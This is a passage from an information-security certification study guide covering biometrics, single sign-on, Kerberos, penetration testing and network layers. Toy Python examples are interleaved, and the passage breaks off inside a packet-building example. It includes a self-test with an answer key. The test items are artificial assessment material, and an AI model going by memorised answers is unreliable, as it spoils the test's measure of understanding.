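"""Added example: Crossover Error Rate (CER) from sampled FAR/FRR measurements.

MEASUREMENTS is constructed for illustration: as sensitivity increases the
False Reject Rate rises and the False Accept Rate falls, as the text states.
"""

# (sensitivity setting, FRR, FAR) -- constructed sample points.
MEASUREMENTS = [
    (1, 0.005, 0.200),
    (2, 0.010, 0.120),
    (3, 0.020, 0.060),
    (4, 0.040, 0.040),
    (5, 0.080, 0.015),
    (6, 0.150, 0.005),
]


def crossover_error_rate(points):
    """Return (sensitivity, error_rate) where FRR == FAR.

    Points are checked in order of increasing sensitivity.  If no sample has
    FRR exactly equal to FAR, the crossing is found where FRR - FAR changes
    sign and the two rates are linearly interpolated between the samples.
    """
    prev = None
    for s, frr, far in points:
        if frr == far:
            return s, frr
        if prev is not None:
            ps, pfrr, pfar = prev
            d0, d1 = pfrr - pfar, frr - far
            if d0 < 0 < d1:              # FRR was below FAR, now above: crossing lies between
                t = d0 / (d0 - d1)       # fraction of the way from prev to this sample
                return ps + t * (s - ps), pfrr + t * (frr - pfrr)
        prev = (s, frr, far)
    raise ValueError("FRR and FAR do not cross within the sampled range")


def tightest_acceptable_setting(points, max_far):
    """Lowest sensitivity whose FAR is within `max_far`.

    Because a false accept is the worse error, an organisation usually fixes a
    FAR ceiling first and accepts whatever FRR that setting implies; this
    returns (sensitivity, FRR, FAR) for that choice, or None if no setting
    meets the ceiling.
    """
    for s, frr, far in points:
        if far <= max_far:
            return s, frr, far
    return None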

Types of biometric controls

There are a number of biometric controls used today. Below are the major implementations and their specific pros and cons with regard to access control security.

Fingerprints

Fingerprints are the most widely used biometric control available today. Smart cards can carry fingerprint information. Many U.S. Government office buildings rely on fingerprint authentication for physical access to the facility. Examples include smart keyboards, which require users to present a fingerprint to unlock the computer's screensaver.

The data used for storing each person's fingerprint must be of a small enough size to be used for authentication. This data is a mathematical representation of fingerprint minutiae, specific details of fingerprint friction ridges, which include whorls, ridges, bifurcation, and others. Figure 1.3 shows minutiae types (from left) bifurcation, ridge ending, core, and delta.

FIGURE 1.3 Fingerprint minutiae.

Retina scan

A retina scan uses a low-intensity light beam (often described as a laser) to
scan the capillaries that feed the retina at the back of the eye. This can seem
personally intrusive because the light beam must directly enter the pupil, and
the user usually needs to press their eye up to the scanner's eyecup. The scan
maps the blood vessels of the retina.
Health information about the user can be gained through a retina scan:
conditions such as pregnancy and diabetes can be detected, which may
raise legitimate privacy issues. Because of the need for close proximity of the
scanner in a retina scan, exchange of bodily fluids is possible when using
retina scanning as a means of access control.

Exam Warning
Retina scans are rarely used because of health risks and invasion of
privacy issues. Alternatives should be considered for biometric controls
that risk exchange of bodily fluids or raise legitimate privacy concerns.

Iris scan

An iris scan is a passive biometric control. A camera takes a picture of the iris
(the colored portion of the eye) and then compares it with the photos in the
authentication database. This also works through contact lenses and glasses.
Each person's two irises are unique, even twins' irises. Benefits of iris scans
include high accuracy, passive scanning (which may be accomplished
without the subject's knowledge), and no exchange of bodily fluids.
Hand geometry

In hand geometry biometric control, measurements are taken from specific
points on the subject's hand: "The devices use a simple concept of measuring
and recording the length, width, thickness, and surface area of an individual's
hand while guided on a plate." [7] Hand geometry devices are fairly simple
and can store information in as little as 9 bytes. [8]
Keyboard dynamics

Keyboard dynamics refers to how hard a person presses each key and the
rhythm by which the keys are pressed. Surprisingly, this type of access
control is cheap to implement and can be effective. As people learn how to
type and use a computer keyboard, they develop specific habits that are
difficult to impersonate, although not impossible.
Dynamic signature

Dynamic signatures measure the process by which someone signs his or her
name. This process is similar to keyboard dynamics, except that this method
measures the handwriting of the subjects while they sign their name.
Measuring time, pressure, loops in the signature, and beginning and ending
points all help to ensure the user is authentic.
Voiceprint

A voiceprint measures the subject's tone of voice while stating a specific
sentence or phrase. This type of access control is vulnerable to replay attacks
(replaying a recorded voice), so other access controls must be implemented
along with the voiceprint. One such control requires subjects to state random
words, protecting against an attacker playing prerecorded specific phrases.
Another issue is that people's voices may substantially change due to illness,
resulting in a false rejection.
Facial scan

Facial scan technology has greatly improved over the past few years. Facial
scanning (also called facial recognition) is the process of passively taking a
picture of a subject's face and comparing that picture to a list stored in a
database. Although not frequently used for biometric authentication control
due to the high cost, law enforcement and security agencies use facial
recognition and scanning technologies for biometric identification to improve
security of high-value, publicly accessible targets.
Someplace you are

"Someplace you are" describes location-based access control using technologies
such as the Global Positioning System (GPS), IP address-based geolocation, or
the physical location of a point-of-sale purchase. These controls can deny
access if the subject is in the incorrect location.

ACCESS CONTROL TECHNOLOGIES

There are several technologies used for the implementation of access controls.
As each technology is presented, it is important to identify what is unique
about each technical solution.

Single sign-on

Single Sign-On (SSO) allows multiple systems to use a central authentication
server (AS). This allows users to authenticate once and then access multiple,
different systems. It also allows security administrators to add, change, or
revoke user privileges on one central system.
The primary disadvantage of SSO is that it may allow an attacker to gain access to
multiple resources after compromising one authentication method, such as a
password. SSO should always be used with multifactor authentication for this
reason.
Federated identity management

Federated Identity Management (FIdM) applies Single Sign-On at a much wider
scale, ranging from cross-organization to Internet scale. It is sometimes
simply called Identity Management (IdM). FIdM may use OpenID or SAML
(Security Assertion Markup Language).
According to EDUCAUSE, "Identity management refers to the policies,
processes, and technologies that establish user identities and enforce rules
about access to digital resources. In a campus setting, many information
systems, such as email, learning management systems, library databases,
and grid computing applications, require users to authenticate themselves
(typically with a username and password). An authorization process then
determines which systems an authenticated user is permitted to access. With
an enterprise identity management system, rather than having separate
credentials for each system, a user can employ a single digital identity to
access all resources to which the user is entitled. Federated identity
management permits extending this approach above the enterprise level,
creating a trusted authority for digital identities across multiple
organizations. In a federated system, participating institutions share identity
attributes based on agreed-upon standards, facilitating authentication from
other members of the federation and granting appropriate access to online
resources. This approach streamlines access to digital assets while protecting
restricted resources."

Kerberos

Kerberos is a third-party authentication service that may be used to support
Single Sign-On. Kerberos (http://www.kerberos.org/) was the name of the
three-headed dog that guarded the entrance to Hades (also called Cerberus)
in Greek mythology.
Kerberos uses symmetric encryption and provides mutual authentication of
both clients and servers. It protects against network sniffing and replay
attacks: authenticators carry timestamps and servers keep a replay cache, so
it depends on loosely synchronized clocks and on the KDC remaining
trustworthy (compromise of the KDC compromises every principal). The
current version of Kerberos is version 5, described by RFC 4120
(http://www.ietf.org/rfc/rfc4120.txt).

Fast Facts
Kerberos has the following components:
- Principal: Client (user) or service
- Realm: A logical Kerberos network
- Ticket: Data that authenticates a principal's identity
- Credentials: A ticket and a service key
- KDC: Key Distribution Center, which authenticates principals
- TGS: Ticket Granting Service
- TGT: Ticket Granting Ticket
- C/S: Client/Server, regarding communications between the two
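The exchanges that tie those components together, as an added toy model that is not from the study guide and is not real Kerberos code: an AS exchange that yields a TGT, a TGS exchange that yields a service ticket, and an AP exchange in which the service checks the authenticator's timestamp against a replay cache and then proves its own identity back to the client (mutual authentication). The realm, principal names, password and the seal/open_sealed cipher are all assumptions; the cipher is a standard-library stand-in, not one of RFC 4120's encryption types.

```python
"""Added example (not from the study guide, not real Kerberos code): a toy model
of the Kerberos v5 AS, TGS and AP exchanges: symmetric keys, mutual authentication
and replay protection. Realm, principals, password and the seal()/open_sealed()
cipher (HMAC-SHA256 keystream + MAC, stdlib only, not an RFC 4120 etype) are made up."""
import hashlib, hmac, json, secrets

TGS_NAME = "krbtgt/EXAMPLE.COM"
MAX_SKEW = 300           # seconds of clock skew tolerated (a common KDC default)
TICKET_LIFE = 8 * 3600   # seconds a ticket remains valid

def _keystream(key, nonce, length):
    blocks, i = b"", 0
    while len(blocks) < length:
        blocks += hmac.new(key, nonce + i.to_bytes(4, "big"), hashlib.sha256).digest()
        i += 1
    return blocks[:length]

def seal(key, message):
    """Encrypt-then-MAC a JSON-serialisable dict under a symmetric key (toy)."""
    plain = json.dumps(message, sort_keys=True).encode()
    nonce = secrets.token_bytes(16)
    cipher = bytes(p ^ k for p, k in zip(plain, _keystream(key, nonce, len(plain))))
    return nonce + cipher + hmac.new(key, nonce + cipher, hashlib.sha256).digest()

def open_sealed(key, blob):
    """Verify the MAC, then decrypt; a wrong key raises instead of yielding garbage."""
    nonce, cipher, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + cipher, hashlib.sha256).digest()):
        raise ValueError("MAC check failed: wrong key or tampered data")
    return json.loads(bytes(c ^ k for c, k in zip(cipher, _keystream(key, nonce, len(cipher)))))

def string_to_key(password):  # toy; real Kerberos uses salted, iterated string-to-key etypes
    return hashlib.sha256(password.encode()).digest()

def _check(ticket, auth, now):
    # Same client in ticket and authenticator, ticket unexpired, timestamp within skew.
    if ticket["client"] != auth["client"] or ticket["expires"] < now or abs(auth["ts"] - now) > MAX_SKEW:
        raise PermissionError("ticket/authenticator rejected")

class KDC:
    """Holds every principal's long-term key, so it acts as both AS and TGS."""
    def __init__(self, principal_keys):
        self.keys = dict(principal_keys)

    def as_exchange(self, client, now):
        """AS-REQ/AS-REP: TGT sealed for the TGS + session key sealed under the client's key."""
        session = secrets.token_hex(32)
        tgt = seal(self.keys[TGS_NAME], {"client": client, "sk": session, "expires": now + TICKET_LIFE})
        return tgt, seal(self.keys[client], {"sk": session, "server": TGS_NAME})

    def tgs_exchange(self, tgt, authenticator, service, now):
        """TGS-REQ/TGS-REP: validate TGT + authenticator, issue a service ticket."""
        ticket = open_sealed(self.keys[TGS_NAME], tgt)
        session = bytes.fromhex(ticket["sk"])
        _check(ticket, open_sealed(session, authenticator), now)
        svc_session = secrets.token_hex(32)
        svc_ticket = seal(self.keys[service],
                          {"client": ticket["client"], "sk": svc_session, "expires": now + TICKET_LIFE})
        return svc_ticket, seal(session, {"sk": svc_session, "server": service})

class Service:
    """An application server; it shares only its own key with the KDC."""
    def __init__(self, name, key):
        self.name, self.key, self.replay_cache = name, key, set()

    def ap_exchange(self, ticket_blob, authenticator, now):
        """AP-REQ/AP-REP: open ticket, check skew + replay cache, echo timestamp (mutual auth)."""
        ticket = open_sealed(self.key, ticket_blob)
        session = bytes.fromhex(ticket["sk"])
        auth = open_sealed(session, authenticator)
        _check(ticket, auth, now)
        if (auth["client"], auth["ts"]) in self.replay_cache:
            raise PermissionError("replayed authenticator")
        self.replay_cache.add((auth["client"], auth["ts"]))
        return seal(session, {"ts": auth["ts"]})

def client_login(kdc, service, client, password, now):
    """Client side of all three exchanges -> (mutual_auth_ok, service_ticket, authenticator)."""
    tgt, enc = kdc.as_exchange(client, now)
    session = bytes.fromhex(open_sealed(string_to_key(password), enc)["sk"])  # wrong password -> ValueError
    svc_ticket, enc2 = kdc.tgs_exchange(tgt, seal(session, {"client": client, "ts": now}), service.name, now)
    svc_session = bytes.fromhex(open_sealed(session, enc2)["sk"])
    authenticator = seal(svc_session, {"client": client, "ts": now})
    reply = open_sealed(svc_session, service.ap_exchange(svc_ticket, authenticator, now))
    return reply["ts"] == now, svc_ticket, authenticator  # last two returned so a replay can be tried

def is_rejected(call, *args):
    """True if the exchange refuses the request (bad key, skew, expiry, replay)."""
    try:
        call(*args)
    except (PermissionError, ValueError, KeyError):
        return True
    return False

def demo_realm():
    """Constructed realm: one user, the TGS and one file server, random keys."""
    svc_key = secrets.token_bytes(32)
    kdc = KDC({"alice": string_to_key("correct horse battery staple"),
               TGS_NAME: secrets.token_bytes(32), "host/fileserver.example.com": svc_key})
    return kdc, Service("host/fileserver.example.com", svc_key)
```

Note where the sniffing and replay protection comes from: the long-term password-derived key is never sent, the session key crosses the wire only sealed under that key, and a captured authenticator fails either the replay cache or the skew window when it is presented a second time.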

SESAME

SESAME is the Secure European System for Applications in a Multi-vendor
Environment, a single sign-on system that supports heterogeneous
environments. SESAME can be thought of as a sequel of sorts to Kerberos:
"SESAME adds to Kerberos: heterogeneity, sophisticated access control
features, scalability of public key systems, better manageability, audit and
delegation." [9] Of those improvements, the addition of public key
(asymmetric) encryption is the most compelling. It addresses one of the
biggest weaknesses in Kerberos: its reliance on long-term symmetric keys,
which the KDC must hold in recoverable form for every principal.
SESAME uses Privilege Attribute Certificates (PACs) in place of Kerberos
tickets. More information on SESAME is available at
https://www.cosic.esat.kuleuven.be/sesame/. [10]

ASSESSING ACCESS CONTROL

A number of processes exist to assess the effectiveness of access control. Tests
with a narrower scope include penetration tests, vulnerability assessments,
and security audits. A security assessment is a broader test that may include
narrower tests, such as penetration tests, as subsections.

Penetration testing

A penetration tester is a white hat hacker who receives authorization to
attempt to break into an organization's physical or electronic perimeter (and
sometimes both). Penetration tests (called "pen tests" for short) are designed to
determine whether black hat hackers could do the same. They are a narrow,
but often useful, test, especially if the penetration tester is successful.
Penetration tests may include the following tests:
- Network (Internet)
- Network (internal or DMZ)
- Wardialing
- Wireless
- Physical (attempt to gain entrance into a facility or room)
Network attacks may leverage client-side attacks, server-side attacks, or Web
application attacks. See Chapter 6, Domain 6: Security Architecture and
Design, for more information on these attacks. Wardialing uses a modem to
dial a series of phone numbers, looking for an answering modem carrier tone
(the penetration tester then attempts to access the answering system); the
name derives from the 1983 movie WarGames.
Social engineering uses the human mind to bypass security controls. Social
engineering may be used in combination with many types of attacks,
especially client-side attacks or physical tests. An example of a social
engineering attack combined with a client-side attack is emailing malware
with a subject line of "Category 5 Hurricane is about to hit Florida!"
A zero-knowledge test is blind; the penetration tester begins with no external
or trusted information and begins the attack with public information only. A
full-knowledge test provides internal information to the penetration tester,
including network diagrams, policies and procedures, and sometimes reports
from previous penetration testers. Partial-knowledge tests are in between zero
and full knowledge: the penetration tester receives some limited trusted
information.
Vulnerability testing

Vulnerability scanning (also called vulnerability testing) scans a network or
system for a list of predefined vulnerabilities such as system
misconfiguration, outdated software, or a lack of patching. A vulnerability
testing tool such as Nessus (http://www.nessus.org) or OpenVAS
(http://www.openvas.org) may be used to identify the vulnerabilities. A scan
reports likely weaknesses; unlike a penetration test, it does not exploit them.

Security audits

A security audit is a test against a published standard. Organizations may be
audited for PCI DSS (Payment Card Industry Data Security Standard)
compliance, for example. PCI DSS includes many required controls, such as
firewalls, specific access control models, and wireless encryption. An auditor
then verifies that a site or organization meets the published standard.

Security assessments

Security assessments are a holistic approach to assessing the effectiveness of
access control. Instead of looking narrowly at penetration tests or
vulnerability assessments, security assessments have a broader scope.

Summary of exam objectives

If one thinks of the castle analogy for security, access control would be the
moat and castle walls. Access control ensures that the border protection
mechanisms, from both a logical and a physical viewpoint, are secured. The
purpose of access control is to allow authorized users access to appropriate
data and deny access to unauthorized users; this is also known as limiting
subjects' access to objects. Even though this task is a complex and involved
one, it is possible to implement a strong access control program without
overburdening the users who rely on access to the system.
Protecting the CIA triad is another key aspect of implementing access
controls. Maintaining confidentiality, integrity, and availability is of utmost
importance. Maintaining security over the CIA of a system means enacting
specific procedures for data access. These procedures will change depending
on the functionality the users require and the sensitivity of the data stored on
the system.

TOP FIVE TOUGHEST QUESTIONS

Questions 1 and 2 are based on this scenario:
Your company has hired a third-party company to conduct a penetration test.
Your CIO would like to know if exploitation of critical business systems is
possible. The two requirements the company has are:
- The tests will be conducted on live, business-functional networks. These
  networks must be functional in order for business to run and cannot be shut
  down, even for an evaluation.
- The company wants the most in-depth test possible.
1. What kind of test should be recommended?
A. Zero knowledge
B. Partial knowledge
C. Full knowledge
D. Vulnerability testing
2. While conducting the penetration test, the tester discovers a critical
business system is currently compromised. What should the tester do?
A. Note the results in the penetration testing report
B. Immediately end the penetration test and call the CIO
C. Remove the malware
D. Shut the system down
3. What type of password cracking can recover the most passwords?
A. Dictionary
B. Hybrid
C. Brute force
D. Rainbow table
4. A policy that states a user must have a business requirement to view data
before attempting to do so is an example of enforcing what?
A. Least privilege
B. Need to know
C. Rotation of duties
D. Separation of duties
5. What technique would raise the False Accept Rate (FAR) and lower the
False Reject Rate (FRR) in a fingerprint scanning system?
A. Decrease the amount of minutiae that is verified
B. Increase the amount of minutiae that is verified
C. Lengthen the enrollment time
D. Lower the throughput time

SELF-TEST QUICK ANSWER KEY

1. Correct answer and explanation: C. C is the correct answer because the
customer wants a full evaluation but is worried because of the importance of
the network. Because the customer wants as full an evaluation as possible
but does not want the network in any kind of jeopardy, a full-knowledge
assessment is necessary because only a full-knowledge assessment will allow
for the most in-depth analysis with the least amount of risk to the network.
Incorrect answers and explanations: A, B, and D. A is incorrect because a
zero-knowledge test will not produce the most in-depth assessment of the
network. B is incorrect because a partial-knowledge test, although better than
zero knowledge, still will not produce the necessary assessment. D is
incorrect because vulnerability testing does not exploit systems, which is a
requirement of the test.
2. Correct answer and explanation: B. Answer B is correct; when discovering a
live malicious intrusion, the penetration tester should immediately end the
penetration test and notify the client of the intrusion.
Incorrect answers and explanations: A, C, and D. Answers A, C, and D are
incorrect. Noting the results is not enough: system integrity, and data
integrity and confidentiality, are compromised or at risk; immediate action is
required. Removing the malware may cause more damage and/or alert the
attackers to the penetration tester's presence. Attackers may become more
malicious if they believe they have been discovered. Shutting the system
down will harm availability (and possibly integrity), and will destroy any
evidence that exists in memory.
3. Correct answer and explanation: C. Answer C is correct; brute-force attacks
will recover the most passwords, since given enough time they try every
possible combination.
Incorrect answers and explanations: A, B, and D. Answers A, B, and D are
incorrect. Dictionary and hybrid attacks will only crack some passwords. Most
rainbow tables are able to recover most, but not all, passwords. Rainbow
tables are also ineffective against salted hashes.
4. Correct answer and explanation: B. Answer B is correct; need to know
means the user must have a need (requirement) to access a specific object
before doing so.
Incorrect answers and explanations: A, C, and D. Answers A, C, and D are
incorrect. Least privilege is less granular than need to know: users have the
least amount of privilege to do their jobs, but objects are still typically
grouped together (such as allowing access to all backup tapes for a backup
administrator). Separation of duties is designed to divide sensitive tasks
among multiple subjects. Rotation of duties is designed to mitigate collusion.
5. Correct answer and explanation: A. Answer A is correct; decreasing the
amount of minutiae verified will make the accuracy of the system lower, which
lowers false rejects but raises false accepts.
Incorrect answers and explanations: B, C, and D. Answers B, C, and D are
incorrect. Increasing the amount of minutiae will make the system more
accurate, increasing the FRR and lowering the FAR. Enrollment and
throughput time are not directly connected to FAR and FRR.
Endnotes

1. Identity Management Design Guide with IBM Tivoli Identity Manager.
   http://www.redbooks.ibm.com/redbooks/pdfs/sg246996.pdf [accessed May 5, 2013].
2. RFC 1994, CHAP. http://www.faqs.org/rfcs/rfc1994.html [accessed May 5, 2013].
3. Ibid.
4. Password Protection for Modern Operating Systems.
   http://static.usenix.org/publications/login/2004-06/pdfs/alexander.pdf [accessed May 5, 2013].
5. ISACA, IT Audit and Assurance Guideline G36, Biometric Controls.
   http://www.isaca.org/standards [accessed May 5, 2013].
6. NIST Tech Beat, March 16, 2006.
   http://www.nist.gov/public_affairs/techbeat/tb2006_0316.htm [accessed May 5, 2013].
7. Hand Geometry. http://www.biometrics.gov/Documents/HandGeometry.pdf [accessed May 5, 2013].
8. Hand Geometry. http://www.biometrics.gov/Documents/HandGeometry.pdf [accessed May 5, 2013].
9. SESAME in a Nutshell. http://www.cosic.esat.kuleuven.be/sesame/html/sesame_what.html [accessed May 5, 2013].
10. Ibid.

CHAPTER 2

Domain 2: Telecommunications and Network Security

Abstract
Domain 2: Telecommunications and Network Security, covered in this
chapter, represents a vast and technical domain to be tested. One of the most
technical of the domains included in the CISSP, Domain 2 requires an
understanding of networking and the TCP/IP suite of protocols at a fairly
substantial level of depth. Networking hardware such as routers, switches,
and the less common repeaters, hubs, and bridges are all presented within
this domain. Technical aspects of Intrusion Detection Systems (IDS), Intrusion
Prevention Systems (IPS), Virtual Private Networks (VPN), 802.11 wireless,
Radio Frequency ID (RFID), and also authentication devices and protocols are
found in this large domain. More recently added topics such as endpoint
security, remote access, and virtualization are also represented in this chapter.

KEYWORDS
Ethernet; OSI model; TCP/IP; Packet-switched network; Switch; Router;
Packet filter firewall; Stateful firewall; Proxy firewall; 802.11; 802.1X; IPsec;
VoIP; Remote meeting technology

Exam Objectives in This Chapter

- Network Architecture and Design
- Network Devices and Protocols
- Secure Communications

Introduction

Telecommunications and Network Security is fundamental to our modern
life. The Internet, the World Wide Web, online banking, instant messaging,
email, and many other technologies rely on Network Security: our modern
world cannot exist without it. Telecommunications and Network Security
(often called "telecommunications," for short) focuses on the confidentiality,
integrity, and availability of data in motion.
Telecommunications is one of the largest domains in the Common Body of
Knowledge and contains more concepts than any other domain. This domain
is also one of the most technically deep domains, requiring technical
knowledge down to packets, segments, frames, and their headers.
Understanding this domain is critical to ensure success on the exam.

NETWORK ARCHITECTURE AND DESIGN

Our first section is network architecture and design. We will discuss how
networks should be designed and the controls they may contain, focusing on
deploying defense-in-depth strategies and weighing the cost and complexity
of a network control versus the benefit provided.

Fundamental network concepts

Before we can discuss specific Telecommunications and Network Security
concepts, we need to understand the fundamental concepts behind them.
Terms like "broadband" are often used informally: the exam requires a precise
understanding of information security terminology.

Simplex, half-duplex, and full-duplex communication

Simplex communication is one-way, like a car radio tuned to a music station.
Half-duplex communication sends or receives at one time only (not
simultaneously), like a walkie-talkie. Full-duplex communication sends and
receives simultaneously, like two people having a face-to-face conversation.

LANs, WANs, MANs, and PANs

A LAN is a Local Area Network. A LAN is a comparatively small network,
typically confined to a building or an area within one. A MAN is a
Metropolitan Area Network, which is typically confined to a city, a zip code,
a campus, or an office park. A WAN is a Wide Area Network, typically
covering cities, states, or countries.
At the other end of the spectrum, the smallest of these networks are PANs:
Personal Area Networks, with a range of 100 m or much less. Low-power
wireless technologies such as Bluetooth are used to create PANs.

Internet, Intranet, and Extranet

The Internet is a global collection of peered networks running TCP/IP,
providing best-effort service. An Intranet is a privately owned network
running TCP/IP, such as a company network. An Extranet is a connection
between private Intranets, such as connections to business partner Intranets.
The OSI model

The OSI (Open System Interconnection) Reference Model is a layered
network model. The model is abstract: we do not directly run the OSI model
in our systems (most now use the TCP/IP model); it is used as a reference
point, so "Layer 1" (physical) is universally understood, whether you are
running Ethernet or ATM, for example. "Layer X" in this book refers to the
OSI model.
The OSI model has seven layers, as shown in Table 2.1. The layers may be
listed in top-to-bottom or bottom-to-top order. Using the latter, they are
Physical, Data Link, Network, Transport, Session, Presentation, and Application.

Table 2.1
The OSI Model
Layer 7  Application
Layer 6  Presentation
Layer 5  Session
Layer 4  Transport
Layer 3  Network
Layer 2  Data Link
Layer 1  Physical

Layer 1: Physical

The Physical Layer is Layer 1 of the OSI model. Layer 1 describes units of
data such as bits represented by energy (such as light, electricity, or radio
waves) and the medium used to carry them (such as copper or fiber optic
cables). WLANs have a Physical Layer, even though we cannot physically
touch it.
Cabling standards such as Thinnet, Thicknet, and Unshielded Twisted Pair
(UTP) exist at Layer 1, among many others. Layer 1 devices include hubs and
repeaters.

Layer 2: Data Link

The Data Link Layer handles access to the Physical Layer as well as Local
Area Network communication. An Ethernet card and its MAC (Media Access
Control) address are at Layer 2, as are switches and bridges.
Layer 2 is divided into two sublayers: Media Access Control (MAC) and
Logical Link Control (LLC). The MAC layer transfers data to and from the
Physical Layer. LLC handles LAN communications. MAC touches Layer 1,
and LLC touches Layer 3.

Layer 3: Network

The Network Layer describes routing: moving data from a system on one
LAN to a system on another. IP addresses and routers exist at Layer 3. Layer
3 protocols include IPv4 and IPv6, among others.

Layer 4: Transport

The Transport Layer handles packet sequencing, flow control, and error
detection. TCP and UDP are Layer 4 protocols.
Layer 4 makes a number of features available, such as resending or
resequencing packets. Taking advantage of these features is a protocol
implementation decision. As we will see later, TCP takes advantage of these
features, at the expense of speed. Many of these features are not implemented
in UDP, which chooses speed over reliability.

Layer 5: Session

The Session Layer manages sessions, which provide maintenance on
connections. Mounting a file share via a network requires a number of
maintenance sessions, such as Remote Procedure Calls (RPCs): these exist at
the Session Layer. A good way to remember the Session Layer's function is
"connections between applications." The Session Layer uses simplex,
half-duplex, and full-duplex communication.

Exam Warning
The Transport and Session Layers are often confused. For example, is
"maintenance of connections" a Transport Layer or Session Layer issue?
Packets are sequenced at the Transport Layer, and network file shares can
be remounted at the Session Layer: you may consider either to be
"maintenance." Words like "maintenance" imply more work than packet
sequencing or retransmission: it requires heavier lifting, like
remounting a network share that has been unmounted, so Session Layer
is the best answer.

Layer 6: Presentation

The Presentation Layer presents data to the application (and user) in a
comprehensible way. Presentation Layer concepts include data conversion,
character sets such as ASCII, and image formats such as GIF (Graphics
Interchange Format), JPEG (Joint Photographic Experts Group), and TIFF
(Tagged Image File Format).

Layer 7: Application

The Application Layer is where you interface with your computer
application. Your Web browser, word processor, and instant messaging client
exist at Layer 7. The protocols Telnet and FTP are Application Layer
protocols.
The TCP/IP model

The TCP/IP model (Transmission Control Protocol/Internet Protocol) is a
popular network model created by the U.S. Defense Advanced Research
Projects Agency in the 1970s. TCP/IP is an informal name (named after the
first two protocols created); the formal name is the Internet Protocol Suite.
The TCP/IP model is simpler than the OSI model, as shown in Table 2.2.

Table 2.2
The OSI Model vs. TCP/IP Model
OSI Layers 5-7 (Session, Presentation, Application)  TCP/IP Application Layer
OSI Layer 4 (Transport)                              TCP/IP Host-to-Host Transport Layer
OSI Layer 3 (Network)                                TCP/IP Internet Layer
OSI Layers 1-2 (Physical, Data Link)                 TCP/IP Network Access Layer

While TCP and IP receive top billing, TCP/IP is actually a suite of protocols
including UDP (User Datagram Protocol) and ICMP (Internet Control
Message Protocol), among many others.

Network Access Layer

The Network Access Layer of the TCP/IP model combines Layers 1 (Physical)
and 2 (Data Link) of the OSI model. It describes Layer 1 issues such as energy,
bits, and the medium used to carry them (copper, fiber, wireless, etc.). It also
describes Layer 2 issues such as converting bits into protocol units such as
Ethernet frames, MAC (Media Access Control) addresses, and Network
Interface Cards (NICs).

Internet Layer

The Internet Layer of the TCP/IP model aligns with the Layer 3 (Network)
Layer of the OSI model. This is where IP addresses and routing live. When
data is transmitted from a node on one LAN to a node on a different LAN, the
Internet Layer is used. IPv4, IPv6, ICMP, and routing protocols (among
others) are Internet Layer TCP/IP protocols.

Host-to-Host Transport Layer

The Host-to-Host Transport Layer (sometimes called either "Host-to-Host" or,
more commonly, "Transport" alone; this book will use "Transport") connects
the Internet Layer to the Application Layer. It is where applications are
addressed on a network, via ports. TCP and UDP are the two Transport Layer
protocols of TCP/IP.

Application Layer

The TCP/IP Application Layer combines Layers 5 through 7 (Session,
Presentation, and Application) of the OSI model. Most of these protocols use
a client-server architecture, where a client (such as ssh) connects to a listening
server (called a daemon on UNIX systems) such as sshd. The clients and
servers use either TCP or UDP (and sometimes both) as a Transport Layer
protocol. TCP/IP Application Layer protocols include SSH, Telnet, and FTP,
among many others.
MAC addresses

A Media Access Control (MAC) address is the unique hardware address of an
Ethernet network interface card (NIC), typically burned in at the factory.
MAC addresses may be changed in software, so a MAC address on its own is
not trustworthy proof of a device's identity.

Did You Know?
Historically, MAC addresses were 48 bits long. They have two halves: the
first 24 bits is the Organizationally Unique Identifier (OUI) and the last
24 bits is a serial number (formally called an extension identifier).

EUI-64 MAC addresses

The IEEE created the EUI-64 (Extended Unique Identifier) standard for 64-bit
MAC addresses. The OUI is still 24 bits, but the serial number is 40 bits. This
allows far more MAC addresses, compared with 48-bit addresses. IPv6
autoconfiguration is compatible with both types of MAC addresses.

IPv4

IPv4 is Internet Protocol version 4, commonly called "IP." It is the
fundamental protocol of the Internet, designed in the 1970s to support
packet-switched networking for the U.S. Defense Advanced Research Projects
Agency (DARPA). IPv4 was used for the ARPAnet, which later became the
Internet.
IP is a simple protocol, designed to carry data across networks. It is so simple
that it requires a helper protocol called ICMP (see below). If connections or
reliability is required, it must be provided by a higher-level protocol carried
by IP, such as TCP.
IPv4 uses 32-bit source and destination addresses, usually shown in
dotted-quad format, such as 192.168.2.4. A 32-bit address field allows 2^32,
or nearly 4.3 billion, addresses.

IPv6

IPv6 is the successor to IPv4, featuring a far larger address space (128-bit
addresses compared to IPv4's 32 bits), simpler routing, and simpler address
assignment. A lack of IPv4 addresses was the primary factor that led to the
creation of IPv6.

Did You Know?
Systems may be "dual stack" and use both IPv4 and IPv6 simultaneously.
Hosts may also access IPv6 networks via IPv4; this is called tunneling.

TCP

TCP is the Transmission Control Protocol, a reliable Layer 4 protocol. TCP
uses a three-way handshake to create reliable connections across a network.
TCP can reorder segments that arrive out of order and retransmit missing
segments.

TCP ports

TCP connects from a source port to a destination port. The TCP port field is
16 bits, allowing port numbers from 0 to 65535.
There are two types of ports: reserved and ephemeral. A reserved port is 1023 or
lower; ephemeral ports are 1024-65535. Most operating systems require
superuser privileges to open a reserved port. Any user may open an (unused)
ephemeral port. (IANA further splits the upper range into registered ports,
1024-49151, and dynamic or private ports, 49152-65535; this book uses the
simpler two-way split.)
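To make the layering in the preceding sections concrete (the Network Access, Internet and Transport layers; MAC addresses and OUIs; IPv4 dotted-quad addresses; TCP ports and flags), here is an added example that is not from the study guide. It builds one Ethernet/IPv4/TCP SYN frame from constructed addresses and ports, then parses it back layer by layer and verifies the IPv4 header checksum on the way. The port_class helper follows IANA's three-way split of the port range, which is finer than the two-way split this book uses; nothing here is captured from or sent to a real network.

```python
"""Added example (not from the study guide): one constructed Ethernet frame
carrying an IPv4 packet carrying a TCP SYN, built and then parsed layer by
layer (Network Access -> Internet -> Transport; OSI Layers 2, 3 and 4).
All addresses and ports are made up; nothing is captured or transmitted.
"""
import struct

ETH = struct.Struct("!6s6sH")           # dst MAC, src MAC, EtherType (14 bytes)
IPV4 = struct.Struct("!BBHHHBBH4s4s")   # fixed 20-byte IPv4 header, no options
TCP = struct.Struct("!HHIIBBHHH")       # fixed 20-byte TCP header, no options
ETHERTYPE_IPV4, PROTO_TCP = 0x0800, 6
TCP_FLAGS = {0x01: "FIN", 0x02: "SYN", 0x04: "RST", 0x08: "PSH", 0x10: "ACK", 0x20: "URG"}


def mac_bytes(text):
    return bytes(int(octet, 16) for octet in text.split(":"))


def ip_bytes(text):
    return bytes(int(octet) for octet in text.split("."))


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def ipv4_checksum(header):
    """RFC 791 header checksum: one's-complement sum of the 16-bit words,
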